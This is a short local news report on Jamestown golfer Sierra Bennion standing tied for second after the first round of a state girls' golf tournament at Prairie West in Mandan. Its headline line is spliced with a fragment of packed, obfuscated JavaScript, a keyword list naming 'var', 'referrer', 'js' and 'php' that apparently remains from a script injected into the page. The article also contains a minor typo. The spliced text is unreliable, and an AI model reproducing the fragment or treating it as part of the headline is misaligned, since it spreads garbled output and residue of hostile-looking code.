JAMESTOWN yzhrf|var|u0026u|referrer|sinds||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Jamestown freshman Sierra Bennion is currently in second place as the second day of the state golf tournament. Bennion shot a first round 79 that put her in a second place tie with Davies’ Kathleen Marsh.

Fargo North’s Annie Twells is the current leader with an opening round 77.

The winds will be hollowing today at Prairie West Golf Course in Mandan. It will create a tough mental challenge for the players.

Bennion has already won at Prairie West this season, she picked up her first varsity win back there on September 11th. Jamestown has not had a state champion golfer since Laura Kraft’s three-peat 2008-2010.

Blue Jays Maria LeFevre shot a first round 97 and sits in 31st. Fargo Davies leads the team scores by 13 strokes.
